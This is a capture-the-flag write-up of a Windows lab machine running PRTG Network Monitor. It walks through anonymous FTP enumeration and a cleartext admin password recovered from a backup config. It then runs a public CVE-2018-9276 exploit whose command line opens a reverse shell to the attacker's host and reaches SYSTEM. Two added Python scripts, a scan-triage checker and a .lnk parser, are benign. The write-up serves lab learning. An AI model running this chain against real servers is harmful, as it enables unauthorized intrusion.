Enumeration
Nmap result
Nmap scan report for 10.10.10.152
Host is up (0.18s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-04-12T01:51:19
|_ start_date: 2024-04-12T01:48:33
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
FTP, SMB, and a web server are open. Let's check each of them.
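Before moving on, here is an added triage script (my own code, not part of the original writeup) that reads the Nmap lines above and reports the three weaknesses a defender would want fixed: anonymous FTP whose listing exposes the system drive, SMB signing that is enabled but not required, and a PRTG build older than the fixed release. The sample input is the relevant part of the scan from this page; the fixed version 18.2.39 for CVE-2018-9276 is an assumption to confirm against the vendor advisory, and all function names are mine.

```python
"""Triage checks over Nmap -sV output (added example, not from the original writeup)."""
import re

# Constructed sample: the relevant lines of the Nmap report shown in this writeup.
NMAP_OUTPUT = """\
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-25-19 10:15PM <DIR> inetpub
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
| smb2-security-mode:
|_ Message signing enabled but not required
"""

# Assumption: CVE-2018-9276 was fixed in PRTG 18.2.39; confirm against the vendor advisory.
PRTG_FIXED_VERSION = (18, 2, 39)

# Directories that only show up in an FTP listing when the FTP root is the Windows system drive.
SYSTEM_ROOT_DIRS = {"windows", "users", "program files", "program files (x86)"}


def parse_version(text):
    """Turn 'PRTG/18.1.37.13946' (or any 'a.b.c' string) into a tuple of ints; None if absent."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None


def triage(nmap_output):
    """Return a list of (severity, finding) tuples derived from the scan text."""
    findings = []
    lines = nmap_output.splitlines()

    # 1. Anonymous FTP, and whether the listing exposes the system drive root.
    if any("ftp-anon: Anonymous FTP login allowed" in ln for ln in lines):
        listed = {re.sub(r"^\|_?\s*", "", ln).split("<DIR>")[-1].strip().lower()
                  for ln in lines if "<DIR>" in ln}
        exposed = sorted(listed & SYSTEM_ROOT_DIRS)
        severity = "high" if exposed else "medium"
        detail = f"; listing exposes system directories: {', '.join(exposed)}" if exposed else ""
        findings.append((severity, "Anonymous FTP login allowed" + detail))

    # 2. SMB signing 'enabled but not required' leaves SMB open to relay of captured sessions.
    if any("Message signing enabled but not required" in ln for ln in lines):
        findings.append(("medium", "SMB message signing not required (smb2-security-mode)"))

    # 3. PRTG version from the Server header compared against the fixed release.
    for ln in lines:
        m = re.search(r"PRTG/(\d+\.\d+\.\d+)", ln)
        if m:
            if parse_version(m.group(1)) < PRTG_FIXED_VERSION:
                fixed = ".".join(map(str, PRTG_FIXED_VERSION))
                findings.append(("critical", f"PRTG {m.group(1)} is older than {fixed} (CVE-2018-9276)"))
            break

    return findings


if __name__ == "__main__":
    for severity, text in triage(NMAP_OUTPUT):
        print(f"[{severity}] {text}")
```

The same function works on a full `nmap -sV -sC` text report; it only looks for the three patterns, so unrelated output is ignored.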
FTP
Since anonymous FTP login is allowed, let's get into the service.
I enumerated directories and found user.txt in /Users/Public/Desktop.
I also found some other files there.
ftp> ls
229 Entering Extended Passive Mode (|||49886|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1195 PRTG Enterprise Console.lnk
02-03-19 12:18AM 1160 PRTG Network Monitor.lnk
04-11-24 09:49PM 34 user.txt
I don't know what PRTG is yet, but I'll grab these files for later use.
HTTP
Next, let's see what's on the web page.
Oh, it's a login page, and it's called PRTG Network Monitor.
We got files related to something called PRTG from the FTP service!
I tried the default credentials prtgadmin:prtgadmin, but that failed.
I checked the files from FTP again.
strings PRTG\ Enterprise\ Console.lnk
/C:\
PROGRA~2
CNB"
PRTGNE~1
!CNB".
PRTGEN~1.EXE
CN)"CN)".
C:\Program Files (x86)\PRTG Network Monitor\PRTG Enterprise Console.exe
netmon
1SPS
1SPS
strings PRTG\ Network\ Monitor.lnk
/C:\
PROGRA~2
CNB"
PRTGNE~1
!CNB".
PRTGGU~1.EXE
CN)"CN)".
C:\Program Files (x86)\PRTG Network Monitor\PRTG GUI Starter.exe
netmon
1SPS
1SPS
I checked both files, but there seems to be nothing to pick up.
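As an added example (my own code, not from the original post), here is a small parser for the Shell Link (.lnk) format that recovers the LocalBasePath field directly instead of fishing it out of `strings` output. It follows the MS-SHLLINK layout: a 76-byte header with the LinkFlags at offset 20, an optional LinkTargetIDList, then a LinkInfo block whose header holds the offset of the ANSI base path. The sample .lnk is constructed inline by `build_lnk`; all function and constant names are mine.

```python
"""Minimal .lnk LinkInfo parser (added example, not from the original writeup)."""
import struct

HEADER_SIZE = 0x4C
# CLSID {00021401-0000-0000-C000-000000000046} in its on-disk little-endian byte order.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01   # LinkFlags bit: a LinkTargetIDList follows the header
HAS_LINK_INFO = 0x02             # LinkFlags bit: a LinkInfo structure is present
VOLUME_ID_AND_LOCAL_BASE_PATH = 0x01  # LinkInfoFlags bit: VolumeID and LocalBasePath present


def build_lnk(local_base_path, with_idlist=True):
    """Construct a small but well-formed .lnk pointing at local_base_path (test input only)."""
    flags = HAS_LINK_INFO | (HAS_LINK_TARGET_ID_LIST if with_idlist else 0)
    # ShellLinkHeader: size, CLSID, LinkFlags, FileAttributes, three FILETIMEs, FileSize,
    # IconIndex, ShowCommand (1 = SW_SHOWNORMAL), HotKey, Reserved1..3.
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    idlist = b""
    if with_idlist:
        item = struct.pack("<H", 4) + b"\x1f\x00"      # one ItemID: size 4, two payload bytes
        body = item + b"\x00\x00"                      # TerminalID
        idlist = struct.pack("<H", len(body)) + body   # IDListSize + IDList
    # VolumeID: size, DriveType (3 = fixed), serial, VolumeLabelOffset (0x10), empty label.
    volume_id = struct.pack("<IIII", 0x11, 3, 0x12345678, 0x10) + b"\x00"
    path = local_base_path.encode("latin-1") + b"\x00"
    suffix = b"\x00"                                   # empty CommonPathSuffix
    info_header_size = 0x1C
    volume_id_off = info_header_size
    local_base_off = volume_id_off + len(volume_id)
    suffix_off = local_base_off + len(path)
    info_size = suffix_off + len(suffix)
    link_info = struct.pack("<IIIIIII", info_size, info_header_size,
                            VOLUME_ID_AND_LOCAL_BASE_PATH, volume_id_off,
                            local_base_off, 0, suffix_off)
    return header + idlist + link_info + volume_id + path + suffix


def parse_local_base_path(data):
    """Return the LocalBasePath of a .lnk, or None if the link carries no local path."""
    if (len(data) < HEADER_SIZE or data[:4] != struct.pack("<I", HEADER_SIZE)
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        idlist_size = struct.unpack_from("<H", data, pos)[0]
        pos += 2 + idlist_size                         # skip IDListSize field and the list
    if not flags & HAS_LINK_INFO:
        return None
    (_info_size, _info_header_size, info_flags, _vol_off,
     base_off, _net_off, _suffix_off) = struct.unpack_from("<IIIIIII", data, pos)
    if not info_flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
        return None
    # Headers of 0x24 bytes or more also carry Unicode offsets; the ANSI path is enough here.
    start = pos + base_off
    end = data.index(b"\x00", start)
    # ANSI path; latin-1 is a byte-preserving stand-in for the link's code page.
    return data[start:end].decode("latin-1")


def local_base_path_from_file(filename):
    """Convenience wrapper for a .lnk pulled off a share or FTP server."""
    with open(filename, "rb") as f:
        return parse_local_base_path(f.read())


if __name__ == "__main__":
    sample = build_lnk(r"C:\Program Files (x86)\PRTG Network Monitor\PRTG GUI Starter.exe")
    print(parse_local_base_path(sample))
```

Run it against the two .lnk files from the FTP server with `local_base_path_from_file("PRTG Network Monitor.lnk")` to get the same target paths that appeared in the `strings` output, this time from the field that actually defines them.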
So I looked at the FTP server again and found one more file related to PRTG.
In the /Windows directory, there was a file named PRTG Configuration.dat.
The file is too long to show in full. Let's look at its first few lines.
head PRTG\ Configuration.dat
<?xml version="1.0" encoding="UTF-8"?>
<root version="16" oct="PRTG Network Monitor 18.1.37.13946" saved="2/26/2019 2:54:23 AM" max="2017" guid="{221B25D6-9282-418B-8364-F59561032EE3}" treeversion="0" created="2019-02-02-23-18-27" trial="42f234beedd545338910317db1fca74dbe84030f">
<statistics time="26-02-2019 02:50:23">
<statistic name="State Changes">
OK, we found the version.
Let's google whether there are any known vulnerabilities for it.
I found a POC for CVE-2018-9276:
https://github.com/A1vinSmith/CVE-2018-9276
However, to use this tool, we need credentials for a user.
So I looked for credentials on the FTP server again…
After tedious enumeration of directories, I finally found the right place.
The directory was hidden 🙁
I went to C:\programdata\Paessler
ftp> ls
229 Entering Extended Passive Mode (|||51661|)
150 Opening ASCII mode data connection.
08-18-23 08:20AM <DIR> Configuration Auto-Backups
04-11-24 09:49PM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
04-11-24 09:49PM <DIR> Logs (Web Server)
04-11-24 09:54PM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
04-11-24 11:12PM 1698499 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
In PRTG Configuration.old.bak, I found the password.
I managed to log in using the password PrTg@dmin2019.
The backup file was created in 2018, and the configuration file was created in 2019.
OK, login confirmed.
Let's use the tool we found.
Root privilege
Clone the git repo and execute the program:
chmod +x exploit.py
./exploit.py -i 10.10.10.152 -p 80 --lhost 10.10.14.3 --lport 80 --user prtgadmin --password PrTg@dmin2019
[+] Listening on [10.10.14.3:80 for the reverse shell!]
listening on [any] 80 ...
[*] Incoming connection (10.10.10.152,51911)
[*] AUTHENTICATE_MESSAGE (\,NETMON)
[*] User NETMON\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.152] 51919
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
We are in!
The root.txt file can be found in C:\Users\Administrator\Desktop.
The machine wasn't that hard. However, directory enumeration on the FTP server was tedious.
If I hadn't checked the manual on the official website, I wouldn't have been able to find the correct path, because the directory was hidden!
Lesson learned from this challenge: check the official documentation.